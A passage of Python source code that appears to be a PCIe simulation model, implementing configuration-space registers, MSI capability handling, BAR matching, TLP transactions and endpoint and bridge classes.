0)\n if mask & 0x2: self.enable_clock_power_management = (data & 1 << 8 != 0)\n if mask & 0x2: self.hardware_autonomous_width_disable = (data & 1 << 9 != 0)\n if mask & 0x2: self.link_bandwidth_management_interrupt_enable = (data & 1 << 10 != 0)\n if mask & 0x2: self.link_autonomous_bandwidth_interrupt_enable = (data & 1 << 11 != 0)\n # Link status\n if mask & 0x8 and data & 1 << 30: self.link_bandwidth_management_status = False\n if mask & 0x8 and data & 1 << 31: self.link_autonomous_bandwidth_status = False\n elif reg == 6:\n # Slot control\n if mask & 0x1: self.attention_button_pressed_enable = (data & 1 << 0 != 0)\n if mask & 0x1: self.power_fault_detected_enable = (data & 1 << 1 != 0)\n if mask & 0x1: self.mrl_sensor_changed_enable = (data & 1 << 2 != 0)\n if mask & 0x1: self.presence_detect_changed_enable = (data & 1 << 3 != 0)\n if mask & 0x1: self.command_completed_interrupt_enable = (data & 1 << 4 != 0)\n if mask & 0x1: self.hot_plug_interrupt_enable = (data & 1 << 5 != 0)\n if mask & 0x1: self.attention_indicator_control = (data >> 6) & 0x3\n if mask & 0x2: self.power_indicator_control = (data >> 8) & 0x3\n if mask & 0x2: self.power_controller_control = (data & 1 << 10 != 0)\n if mask & 0x2: self.electromechanical_interlock_control = (data & 1 << 11 != 0)\n if mask & 0x2: self.data_link_layer_state_changed_enable = (data & 1 << 12 != 0)\n # Slot status\n if mask & 0x4 and data & 1 << 16: self.attention_button_pressed = False\n if mask & 0x4 and data & 1 << 17: self.power_fault_detected = False\n if mask & 0x4 and data & 1 << 18: self.mrl_sensor_changed = False\n if mask & 0x4 and data & 1 << 19: self.presence_detect_changed = False\n if mask & 0x4 and data & 1 << 20: self.command_completed = False\n if mask & 0x8 and data & 1 << 24: self.data_link_layer_state_changed = False\n elif reg == 7:\n # Root control\n if mask & 0x1: self.system_error_on_correctable_error_enable = (data & 1 << 0 != 0)\n if mask & 0x1: self.system_error_on_non_fatal_error_enable = (data & 1 << 1 != 0)\n if mask & 0x1: self.system_error_on_fatal_error_enable = (data & 1 << 2 != 0)\n if mask & 0x1: self.pme_interrupt_enable = (data & 1 << 3 != 0)\n if mask & 0x1: self.crs_software_visibility_enable = (data & 1 << 4 != 0)\n elif reg == 8:\n # Root status\n if mask & 0x4 and data & 1 << 16: self.pme_status = False\n elif reg == 10:\n # Device control 2\n if mask & 0x1: 
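The status-bit writes above (e.g. clearing correctable_error_detected when bit 16 is written as 1) implement PCIe write-1-to-clear (RW1C) semantics: writing 1 clears a status bit, writing 0 leaves it untouched. A minimal standalone sketch (names hypothetical):

def rw1c_update(status, write_data, rw1c_mask):
    # only bits written as 1 within the RW1C field get cleared
    return status & ~(write_data & rw1c_mask)

status = 0b1011                                   # three status bits set
status = rw1c_update(status, 0b0010, rw1c_mask=0b1111)
assert status == 0b1001                           # exactly one bit cleared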
self.completion_timeout_value = data & 0xf\n if mask & 0x1: self.completion_timeout_disable = (data & 1 << 4 != 0)\n if mask & 0x1: self.ari_forwarding_enable = (data & 1 << 5 != 0)\n if mask & 0x1: self.atomic_op_requester_enable = (data & 1 << 6 != 0)\n if mask & 0x1: self.atomic_op_egress_blocking = (data & 1 << 7 != 0)\n if mask & 0x2: self.ido_request_enable = (data & 1 << 8 != 0)\n if mask & 0x2: self.ido_completion_enable = (data & 1 << 9 != 0)\n if mask & 0x2: self.ltr_mechanism_enable = (data & 1 << 10 != 0)\n if mask & 0x2: self.obff_enable = (data >> 13) & 0x3\n if mask & 0x2: self.end_end_tlp_prefix_blocking = (data & 1 << 15 != 0)\n # Device status 2\n elif reg == 12:\n # Link control 2\n if mask & 0x1: self.target_link_speed = data & 0xf\n if mask & 0x1: self.enter_compliance = (data & 1 << 4 != 0)\n if mask & 0x1: self.hardware_autonomous_speed_disable = (data & 1 << 5 != 0)\n if mask & 0x1: self.transmit_margin = self.transmit_margin & 0x6 | (data >> 7) & 0x1\n if mask & 0x2: self.transmit_margin = self.transmit_margin & 0x1 | (data >> 7) & 0x6\n if mask & 0x2: self.enter_modified_compliance = (data & 1 << 10 != 0)\n if mask & 0x2: self.compliance_sos = (data & 1 << 11 != 0)\n if mask & 0x2: self.compliance_preset_de_emphasis = (data >> 12) & 0xff\n # Link status 2\n if self.link_equalization_request: val |= 1 << 21\n\n def initiate_function_level_reset(self):\n pass\n\n def initiate_retrain_link(self):\n pass\n\n\nclass MSICapability(object):\n def __init__(self, *args, **kwargs):\n super(MSICapability, self).__init__(*args, **kwargs)\n\n # MSI Capability Registers\n self.msi_enable = False\n self.msi_multiple_message_capable = 0\n self.msi_multiple_message_enable = 0\n self.msi_64bit_address_capable = 0\n self.msi_per_vector_mask_capable = 0\n self.msi_message_address = 0\n self.msi_message_data = 0\n self.msi_mask_bits = 0\n self.msi_pending_bits = 0\n\n self.register_capability(MSI_CAP_ID, MSI_CAP_LEN, self.read_msi_cap_register, self.write_msi_cap_register)\n\n \"\"\"\n MSI Capability (32 bit)\n\n 31 0\n +---------------------------------+----------------+----------------+\n | Message Control | Next Cap | Cap ID | 0 0x00\n +---------------------------------+----------------+----------------+\n | Message Address | 1 0x04\n +---------------------------------+---------------------------------+\n | | Message Data | 2 0x08\n +---------------------------------+---------------------------------+\n\n MSI Capability (64 bit)\n\n 31 0\n +---------------------------------+----------------+----------------+\n | Message Control | Next Cap | Cap ID | 0 0x00\n +---------------------------------+----------------+----------------+\n | Message Address | 1 0x04\n +-------------------------------------------------------------------+\n | Message Upper Address | 2 0x08\n +---------------------------------+---------------------------------+\n | | Message Data | 3 0x0C\n +---------------------------------+---------------------------------+\n\n MSI Capability (32 bit with per-vector masking)\n\n 31 0\n +---------------------------------+----------------+----------------+\n | Message Control | Next Cap | Cap ID | 0 0x00\n +---------------------------------+----------------+----------------+\n | Message Address | 1 0x04\n +-------------------------------------------------------------------+\n | | Message Data | 2 0x08\n +---------------------------------+---------------------------------+\n | Mask Bits | 3 0x0C\n +-------------------------------------------------------------------+\n | Pending 
Bits | 4 0x10\n +-------------------------------------------------------------------+\n\n MSI Capability (64 bit with per-vector masking)\n\n 31 0\n +---------------------------------+----------------+----------------+\n | Message Control | Next Cap | Cap ID | 0 0x00\n +---------------------------------+----------------+----------------+\n | Message Address | 1 0x04\n +-------------------------------------------------------------------+\n | Message Upper Address | 2 0x08\n +---------------------------------+---------------------------------+\n | | Message Data | 3 0x0C\n +---------------------------------+---------------------------------+\n | Mask Bits | 4 0x10\n +-------------------------------------------------------------------+\n | Pending Bits | 5 0x14\n +-------------------------------------------------------------------+\n \"\"\"\n def read_msi_cap_register(self, reg):\n if reg == 0:\n # Message control\n val = 0x00000000\n if self.msi_enable: val |= 1 << 16\n val |= (self.msi_multiple_message_capable & 0x7) << 17\n val |= (self.msi_multiple_message_enable & 0x7) << 20\n if self.msi_64bit_address_capable: val |= 1 << 23\n if self.msi_per_vector_mask_capable: val |= 1 << 24\n return val\n elif reg == 1:\n # Message address\n return self.msi_message_address & 0xfffffffc\n elif reg == 2 and self.msi_64bit_address_capable:\n # Message upper address\n return (self.msi_message_address >> 32) & 0xffffffff\n elif reg == (3 if self.msi_64bit_address_capable else 2):\n # Message data\n return self.msi_message_data & 0xffff\n elif reg == (4 if self.msi_64bit_address_capable else 3) and self.msi_per_vector_mask_capable:\n # Mask bits\n return self.msi_mask_bits & 0xffffffff\n elif reg == (5 if self.msi_64bit_address_capable else 4) and self.msi_per_vector_mask_capable:\n # Pending bits\n return self.msi_pending_bits & 0xffffffff\n\n def write_msi_cap_register(self, reg, data, mask):\n if reg == 0:\n # Message control\n if mask & 0x4: self.msi_enable = (data & 1 << 16 != 0)\n if mask & 0x4: self.msi_multiple_message_enable = (data >> 20) & 0x7\n elif reg == 1:\n # Message address\n self.msi_message_address = byte_mask_update(self.msi_message_address, mask, data) & 0xfffffffffffffffc\n elif reg == 2 and self.msi_64bit_address_capable:\n # Message upper address\n self.msi_message_address = byte_mask_update(self.msi_message_address, mask << 4, data << 32) & 0xfffffffffffffffc\n elif reg == (3 if self.msi_64bit_address_capable else 2):\n # Message data\n self.msi_message_data = byte_mask_update(self.msi_message_data, mask & 0x3, data) & 0xffff\n elif reg == (4 if self.msi_64bit_address_capable else 3) and self.msi_per_vector_mask_capable:\n # Mask bits\n self.msi_mask_bits = byte_mask_update(self.msi_mask_bits, mask, data) & 0xffffffff\n\n def issue_msi_interrupt(self, number=0, attr=0, tc=0):\n if not self.msi_enable:\n print(\"MSI disabled\")\n return\n if number < 0 or number >= 2**self.msi_multiple_message_enable or number >= 2**self.msi_multiple_message_capable:\n print(\"MSI message number out of range\")\n return\n\n data = self.msi_message_data & ~(2**self.msi_multiple_message_enable-1) | number\n yield from self.mem_write(self.msi_message_address, struct.pack('> 1) & 1, data >> 8)\n self.bist = byte_mask_update(self.bist, (mask >> 3) & 1, data >> 24)\n elif reg == 15:\n self.intr_line = byte_mask_update(self.intr_line, mask & 1, data)\n self.intr_pin = byte_mask_update(self.intr_pin, (mask >> 1) & 1, data >> 8)\n elif 16 <= reg < 256: self.write_capability_register(reg, data, mask)\n elif 
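issue_msi_interrupt below ORs the vector number into the low log2(N) bits of the programmed message data, which is how multi-message MSI encodes the vector; a worked sketch with hypothetical values:

msi_message_data = 0x4940        # value the host programmed into the capability
multiple_message_enable = 3      # 2**3 = 8 vectors enabled
number = 5                       # vector to signal
data = msi_message_data & ~(2**multiple_message_enable - 1) | number
assert data == 0x4945            # the vector number occupies the low 3 bits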
256 <= reg < 4096: self.write_extended_capability_register(reg, data, mask)\n\n def read_capability_register(self, reg):\n return self.capabilities.read_register(reg)\n\n def write_capability_register(self, reg, data, mask):\n self.capabilities.write_register(reg, data, mask)\n\n def register_capability(self, cap_id, length=None, read=None, write=None, offset=None):\n self.capabilities.register(cap_id, 0, length, read, write, offset)\n if self.capabilities.list:\n self.cap_ptr = self.capabilities.list[0].offset*4\n else:\n self.cap_ptr = 0\n\n def read_extended_capability_register(self, reg):\n return self.ext_capabilities.read_register(reg)\n\n def write_extended_capability_register(self, reg, data, mask):\n self.ext_capabilities.write_register(reg, data, mask)\n\n def register_extended_capability(self, cap_id, cap_ver, length=None, read=None, write=None, offset=None):\n self.ext_capabilities.register(cap_id, cap_ver, length, read, write, offset)\n\n def configure_bar(self, idx, size, ext=False, prefetch=False, io=False):\n mask = 2**math.ceil(math.log(size, 2))-1\n\n if idx >= len(self.bar) or (ext and idx+1 >= len(self.bar)):\n raise Exception(\"BAR index out of range\")\n\n if io:\n self.bar[idx] = 1\n self.bar_mask[idx] = 0xfffffffc & ~mask\n else:\n self.bar[idx] = 0\n self.bar_mask[idx] = 0xfffffff0 & ~mask\n\n if ext:\n self.bar[idx] |= 4\n self.bar[idx+1] = 0\n self.bar_mask[idx+1] = 0xffffffff & (~mask >> 32)\n\n if prefetch:\n self.bar[idx] |= 8\n\n def match_bar(self, addr, io=False):\n m = []\n bar = 0\n while bar < len(self.bar):\n bar_val = self.bar[bar]\n bar_mask = self.bar_mask[bar]\n\n orig_bar = bar\n bar += 1\n\n if bar_mask == 0:\n # unimplemented BAR\n continue\n\n if bar_val & 1:\n # IO BAR\n\n if io and addr & bar_mask == bar_val & bar_mask:\n m.append((orig_bar, addr & ~bar_mask))\n\n else:\n # Memory BAR\n\n if bar_val & 4:\n # 64 bit BAR\n\n if bar >= len(self.bar):\n raise Exception(\"Final BAR marked as 64 bit, but no extension BAR available\")\n\n bar_val |= self.bar[bar] << 32\n bar_mask |= self.bar_mask[bar] << 32\n\n bar += 1\n\n if not io and addr & bar_mask == bar_val & bar_mask:\n m.append((orig_bar, addr & ~bar_mask))\n\n return m\n\n def upstream_send(self, tlp):\n # logging\n print(\"[%s] Sending upstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n if self.upstream_tx_handler is None:\n raise Exception(\"Transmit handler not set\")\n yield from self.upstream_tx_handler(tlp)\n\n def send(self, tlp):\n yield from self.upstream_send(tlp)\n\n def upstream_recv(self, tlp):\n # logging\n print(\"[%s] Got downstream TLP: %s\" % (highlight(self.get_desc()), repr(tlp)))\n assert tlp.check()\n yield from self.handle_tlp(tlp)\n\n def handle_tlp(self, tlp):\n if (tlp.fmt_type == TLP_CPL or tlp.fmt_type == TLP_CPL_DATA or\n tlp.fmt_type == TLP_CPL_LOCKED or tlp.fmt_type == TLP_CPL_LOCKED_DATA):\n self.rx_cpl_queues[tlp.tag].append(tlp)\n self.rx_cpl_sync[tlp.tag].next = not self.rx_cpl_sync[tlp.tag]\n elif tlp.fmt_type in self.rx_tlp_handler:\n yield self.rx_tlp_handler[tlp.fmt_type](tlp)\n else:\n raise Exception(\"Unhandled TLP\")\n\n def register_rx_tlp_handler(self, fmt_type, func):\n self.rx_tlp_handler[fmt_type] = func\n\n def recv_cpl(self, tag, timeout=0):\n queue = self.rx_cpl_queues[tag]\n sync = self.rx_cpl_sync[tag]\n\n if timeout:\n yield sync, delay(timeout)\n else:\n yield sync\n\n if queue:\n return queue.pop(0)\n\n return None\n\n def get_free_tag(self):\n tag_count = 256 if self.extended_tag_field_enable else 
32\n\n for k in range(tag_count):\n self.current_tag = (self.current_tag + 1) % tag_count\n if not self.rx_cpl_queues[self.current_tag]:\n return self.current_tag\n\n return None\n\n def handle_config_0_tlp(self, tlp):\n if tlp.dest_id.device == self.device_num and tlp.dest_id.function == self.function_num:\n # logging\n print(\"[%s] Config type 0 for me\" % (highlight(self.get_desc())))\n\n # capture address information\n self.bus_num = tlp.dest_id.bus\n\n # prepare completion TLP\n cpl = TLP()\n\n # perform operation\n if tlp.fmt_type == TLP_CFG_READ_0:\n cpl.set_completion_data(tlp, self.get_id())\n cpl.data = [self.read_config_register(tlp.register_number)]\n cpl.byte_count = 4\n cpl.length = 1\n elif tlp.fmt_type == TLP_CFG_WRITE_0:\n cpl.set_completion(tlp, self.get_id())\n self.write_config_register(tlp.register_number, tlp.data[0], tlp.first_be)\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.upstream_send(cpl)\n else:\n # error\n pass\n\n def io_read(self, addr, length, timeout=0):\n n = 0\n data = b''\n\n if not self.bus_master_enable:\n print(\"Bus mastering not enabled\")\n return None\n\n while n < length:\n tlp = TLP()\n tlp.fmt_type = TLP_IO_READ\n tlp.requester_id = self.get_id()\n tlp.tag = self.get_free_tag()\n\n first_pad = addr % 4\n byte_length = min(length-n, 4-first_pad)\n tlp.set_be(addr, byte_length)\n\n yield from self.send(tlp)\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl:\n raise Exception(\"Timeout\")\n if cpl.status != CPL_STATUS_SC:\n raise Exception(\"Unsuccessful completion\")\n else:\n assert cpl.length == 1\n d = struct.pack(' 0xffffffff:\n tlp.fmt_type = TLP_MEM_READ_64\n else:\n tlp.fmt_type = TLP_MEM_READ\n tlp.requester_id = self.get_id()\n tlp.tag = self.get_free_tag()\n tlp.attr = attr\n tlp.tc = tc\n\n first_pad = addr % 4\n byte_length = length-n\n byte_length = min(byte_length, (128 << self.max_read_request_size)-first_pad) # max read request size\n byte_length = min(byte_length, 0x1000 - (addr & 0xfff)) # 4k align\n tlp.set_be(addr, length)\n\n yield from self.send(tlp)\n\n m = 0\n\n while m < byte_length:\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl:\n raise Exception(\"Timeout\")\n if cpl.status != CPL_STATUS_SC:\n raise Exception(\"Unsuccessful completion\")\n else:\n assert cpl.byte_count+3+(cpl.lower_address&3) >= cpl.length*4\n assert cpl.byte_count == byte_length - m\n\n d = bytearray()\n\n for k in range(cpl.length):\n d.extend(struct.pack(' 0xffffffff:\n tlp.fmt_type = TLP_MEM_WRITE_64\n else:\n tlp.fmt_type = TLP_MEM_WRITE\n tlp.requester_id = self.get_id()\n tlp.attr = attr\n tlp.tc = tc\n\n first_pad = addr % 4\n byte_length = len(data)-n\n byte_length = min(byte_length, (128 << self.max_payload_size)-first_pad) # max payload size\n byte_length = min(byte_length, 0x1000 - (addr & 0xfff)) # 4k align\n tlp.set_be_data(addr, data[n:n+byte_length])\n\n yield from self.send(tlp)\n\n n += byte_length\n addr += byte_length\n\n def mem_write_words(self, addr, data, ws=2, timeout=0, attr=0, tc=0):\n assert ws in (1, 2, 4, 8)\n words = data\n data = b''\n for w in words:\n data += w.to_bytes(ws, 'little')\n yield from self.mem_write(addr, data, timeout, attr, tc)\n\n def mem_write_dwords(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, data, 4, timeout, attr, tc)\n\n def mem_write_qwords(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, data, 8, timeout, attr, tc)\n\n def 
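mem_read above clamps each request so it neither exceeds the max read request size nor crosses a 4 KB page; the same chunking as a standalone generator (hypothetical helper; encoding 0x2 means 128 << 2 = 512 bytes):

def split_read(addr, length, max_read_request_size=2):
    mrrs = 128 << max_read_request_size          # 512 B for encoding 0x2
    while length > 0:
        first_pad = addr % 4
        n = min(length, mrrs - first_pad)        # max read request size clamp
        n = min(n, 0x1000 - (addr & 0xfff))      # never cross a 4 KB boundary
        yield addr, n
        addr += n
        length -= n

assert list(split_read(0xff0, 0x40)) == [(0xff0, 0x10), (0x1000, 0x30)]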
mem_write_byte(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write(addr, [data], timeout, attr, tc)\n\n def mem_write_word(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def mem_write_dword(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_dwords(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def mem_write_qword(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_qwords(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n\nclass Endpoint(Function):\n \"\"\"PCIe endpoint function, implements endpoint config space\"\"\"\n def __init__(self, *args, **kwargs):\n super(Endpoint, self).__init__(*args, **kwargs)\n\n # configuration registers\n self.header_type = 0\n self.bar = [0]*6\n self.bar_mask = [0]*6\n self.cardbus_cis = 0\n self.subsystem_vendor_id = 0\n self.subsystem_id = 0\n\n self.pcie_device_type = 0\n\n \"\"\"\n Endpoint (type 0) config space\n\n 31 0\n +---------------------------------+---------------------------------+\n | Device ID | Vendor ID | 0 0x00\n +---------------------------------+---------------------------------+\n | Status | Command | 1 0x04\n +---------------------------------+----------------+----------------+\n | Class Code | Revision ID | 2 0x08\n +----------------+----------------+----------------+----------------+\n | BIST | Header Type | Primary | Cache Line | 3 0x0C\n | | | Latency Timer | Size |\n +----------------+----------------+----------------+----------------+\n | Base Address Register 0 | 4 0x10\n +-------------------------------------------------------------------+\n | Base Address Register 1 | 5 0x14\n +-------------------------------------------------------------------+\n | Base Address Register 2 | 6 0x18\n +-------------------------------------------------------------------+\n | Base Address Register 3 | 7 0x1C\n +-------------------------------------------------------------------+\n | Base Address Register 4 | 8 0x20\n +-------------------------------------------------------------------+\n | Base Address Register 5 | 9 0x24\n +-------------------------------------------------------------------+\n | Cardbus CIS pointer | 10 0x28\n +---------------------------------+---------------------------------+\n | Subsystem ID | Subsystem Vendor ID | 11 0x2C\n +---------------------------------+---------------------------------+\n | Expansion ROM Base Address | 12 0x30\n +--------------------------------------------------+----------------+\n | Reserved | Cap Ptr | 13 0x34\n +--------------------------------------------------+----------------+\n | Reserved | 14 0x38\n +----------------+----------------+----------------+----------------+\n | Max Lat | Min Gnt | Int Pin | Int Line | 15 0x3C\n +----------------+----------------+----------------+----------------+\n \"\"\"\n def read_config_register(self, reg):\n if reg == 4: return self.bar[0]\n elif reg == 5: return self.bar[1]\n elif reg == 6: return self.bar[2]\n elif reg == 7: return self.bar[3]\n elif reg == 8: return self.bar[4]\n elif reg == 9: return self.bar[5]\n elif reg == 10: return self.cardbus_cis\n elif reg == 11: return (self.subsystem_id << 16) | self.subsystem_vendor_id\n elif reg == 12: return self.expansion_rom_addr\n elif reg == 13: return self.cap_ptr\n elif reg == 14: return 0 # reserved\n elif reg == 15: return (self.intr_pin << 8) | self.intr_line\n else: return super(Endpoint, self).read_config_register(reg)\n\n def 
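mem_write_words above serializes the word list little-endian before issuing the byte write; a two-word usage sketch of that packing step:

words = [0x11223344, 0xAABBCCDD]     # two 32-bit words (ws = 4)
data = b''
for w in words:
    data += w.to_bytes(4, 'little')  # same packing as mem_write_words
assert data == b'\x44\x33\x22\x11\xdd\xcc\xbb\xaa'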
write_config_register(self, reg, data, mask):\n if reg == 4: self.bar[0] = byte_mask_update(self.bar[0], mask, data, self.bar_mask[0])\n elif reg == 5: self.bar[1] = byte_mask_update(self.bar[1], mask, data, self.bar_mask[1])\n elif reg == 6: self.bar[2] = byte_mask_update(self.bar[2], mask, data, self.bar_mask[2])\n elif reg == 7: self.bar[3] = byte_mask_update(self.bar[3], mask, data, self.bar_mask[3])\n elif reg == 8: self.bar[4] = byte_mask_update(self.bar[4], mask, data, self.bar_mask[4])\n elif reg == 9: self.bar[5] = byte_mask_update(self.bar[5], mask, data, self.bar_mask[5])\n elif reg == 12: self.expansion_rom_addr = byte_mask_update(self.expansion_rom_addr, mask, data)\n elif reg == 15:\n self.intr_line = byte_mask_update(self.intr_line, mask & 1, data)\n self.intr_pin = byte_mask_update(self.intr_pin, (mask >> 1) & 1, data >> 8)\n else: super(Endpoint, self).write_config_register(reg, data, mask)\n\n\nclass MemoryEndpoint(Endpoint):\n \"\"\"PCIe endpoint function, implements BARs pointing to internal memory\"\"\"\n def __init__(self, *args, **kwargs):\n super(MemoryEndpoint, self).__init__(*args, **kwargs)\n\n self.regions = [None]*6\n self.bar_ptr = 0\n\n self.register_rx_tlp_handler(TLP_IO_READ, self.handle_io_read_tlp)\n self.register_rx_tlp_handler(TLP_IO_WRITE, self.handle_io_write_tlp)\n self.register_rx_tlp_handler(TLP_MEM_READ, self.handle_mem_read_tlp)\n self.register_rx_tlp_handler(TLP_MEM_READ_64, self.handle_mem_read_tlp)\n self.register_rx_tlp_handler(TLP_MEM_WRITE, self.handle_mem_write_tlp)\n self.register_rx_tlp_handler(TLP_MEM_WRITE_64, self.handle_mem_write_tlp)\n\n def add_region(self, size, read=None, write=None, ext=False, prefetch=False, io=False):\n if self.bar_ptr > 5 or (ext and self.bar_ptr > 4):\n raise Exception(\"No more BARs available\")\n\n arr = None\n self.configure_bar(self.bar_ptr, size, ext, prefetch, io)\n if not read and not write:\n arr = bytearray(size)\n self.regions[self.bar_ptr] = arr\n else:\n self.regions[self.bar_ptr] = (read, write)\n if ext:\n self.bar_ptr += 2\n else:\n self.bar_ptr += 1\n return arr\n\n def add_io_region(self, size, read=None, write=None):\n return self.add_region(size, read, write, False, False, True)\n\n def add_mem_region(self, size, read=None, write=None):\n return self.add_region(size, read, write)\n\n def add_prefetchable_mem_region(self, size, read=None, write=None):\n return self.add_region(size, read, write, True, True)\n\n def read_region(self, region, addr, length):\n if not self.regions[region]:\n raise Exception(\"Invalid region\")\n if type(self.regions[region]) is tuple:\n return self.regions[region][0](addr, length)\n else:\n return self.regions[region][addr:addr+length]\n\n def write_region(self, region, addr, data):\n if not self.regions[region]:\n raise Exception(\"Invalid region\")\n if type(self.regions[region]) is tuple:\n self.regions[region][1](addr, length)\n else:\n self.regions[region][addr:addr+len(data)] = data\n\n def handle_io_read_tlp(self, tlp):\n m = self.match_bar(tlp.address, True)\n if len(m) == 1:\n # logging\n print(\"[%s] IO read\" % (highlight(self.get_desc())))\n\n assert tlp.length == 1\n\n # prepare completion TLP\n cpl = TLP()\n cpl.set_completion_data(tlp, self.get_id())\n\n region = m[0][0]\n addr = m[0][1]\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # perform read\n data = bytearray(4)\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n 
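In MemoryEndpoint above, a region is either a bytearray (backing store) or a (read, write) callback pair; a hedged standalone sketch of the intended dispatch, assuming the write callback takes (addr, data):

def write_region(regions, region, addr, data):
    r = regions[region]
    if r is None:
        raise Exception("Invalid region")
    if isinstance(r, tuple):
        r[1](addr, data)                     # callback-backed region
    else:
        r[addr:addr+len(data)] = data        # bytearray-backed region

regions = [bytearray(16)]
write_region(regions, 0, 4, b'\x01\x02')
assert regions[0][4:6] == b'\x01\x02'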
data[start_offset:offset] = self.read_region(region, addr+start_offset, offset-start_offset)\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n data[start_offset:offset] = self.read_region(region, addr+start_offset, offset-start_offset)\n\n cpl.set_data(data)\n cpl.byte_count = 4\n cpl.length = 1\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n else:\n # logging\n print(\"IO request did not match any BARs\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, self.get_id())\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_io_write_tlp(self, tlp):\n m = self.match_bar(tlp.address, True)\n if len(m) == 1:\n # logging\n print(\"[%s] IO write\" % (highlight(self.get_desc())))\n\n assert tlp.length == 1\n\n # prepare completion TLP\n cpl = TLP()\n cpl.set_completion(tlp, self.get_id())\n\n region = m[0][0]\n addr = m[0][1]\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # perform write\n data = tlp.get_data()\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n\n cpl.byte_count = 4\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n else:\n # logging\n print(\"IO request did not match any BARs\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, self.get_id())\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_mem_read_tlp(self, tlp):\n m = self.match_bar(tlp.address)\n if len(m) == 1:\n print(\"[%s] Memory read\" % (highlight(self.get_desc())))\n\n # perform operation\n region = m[0][0]\n addr = m[0][1]\n\n # check for 4k boundary crossing\n if tlp.length*4 > 0x1000 - (addr & 0xfff):\n print(\"Request crossed 4k boundary, discarding request\")\n return\n\n # perform read\n data = bytearray(self.read_region(region, addr, tlp.length*4))\n\n # prepare completion TLP(s)\n m = 0\n n = 0\n addr = tlp.address+tlp.get_first_be_offset()\n dw_length = tlp.length\n byte_length = tlp.get_be_byte_count()\n\n while m < dw_length:\n cpl = TLP()\n cpl.set_completion_data(tlp, self.get_id())\n\n cpl_dw_length = dw_length - m\n cpl_byte_length = byte_length - n\n cpl.byte_count = cpl_byte_length\n if cpl_dw_length > 32 << self.max_payload_size:\n cpl_dw_length = 32 << self.max_payload_size # max payload size\n cpl_dw_length -= (addr & 0x7c) >> 2 # RCB align\n\n cpl.lower_address = addr & 0x7f\n\n cpl.set_data(data[m*4:(m+cpl_dw_length)*4])\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n m += cpl_dw_length;\n n += cpl_dw_length*4 - (addr&3)\n addr += cpl_dw_length*4 - (addr&3)\n\n else:\n # logging\n print(\"Memory request did not match any BARs\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, self.get_id())\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_mem_write_tlp(self, tlp):\n m = 
self.match_bar(tlp.address)\n if len(m) == 1:\n # logging\n print(\"[%s] Memory write\" % (highlight(self.get_desc())))\n\n # perform operation\n region = m[0][0]\n addr = m[0][1]\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # check for 4k boundary crossing\n if tlp.length*4 > 0x1000 - (addr & 0xfff):\n print(\"Request crossed 4k boundary, discarding request\")\n return\n\n # perform write\n data = tlp.get_data()\n\n # first dword\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if tlp.length > 2:\n # middle dwords\n if start_offset is None:\n start_offset = offset\n offset += (tlp.length-2)*4\n\n if tlp.length > 1:\n # last dword\n mask = tlp.last_be\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n self.write_region(region, addr+start_offset, data[start_offset:offset])\n\n # memory writes are posted, so don't send a completion\n\n else:\n # logging\n print(\"Memory request did not match any BARs\")\n\n\nclass Bridge(Function):\n \"\"\"PCIe bridge function, implements bridge config space and TLP routing\"\"\"\n def __init__(self, *args, **kwargs):\n super(Bridge, self).__init__(*args, **kwargs)\n\n # configuration registers\n self.header_type = 1\n self.bar = [0]*2\n self.bar_mask = [0]*2\n self.pri_bus_num = 0\n self.sec_bus_num = 0\n self.sub_bus_num = 0\n self.sec_lat_timer = 0\n self.io_base = 0x0000\n self.io_limit = 0x0fff\n self.sec_status = 0\n self.mem_base = 0x00000000\n self.mem_limit = 0x000fffff\n self.prefetchable_mem_base = 0x00000000\n self.prefetchable_mem_limit = 0x000fffff\n self.bridge_control = 0\n\n self.pcie_device_type = 0x6\n\n self.root = 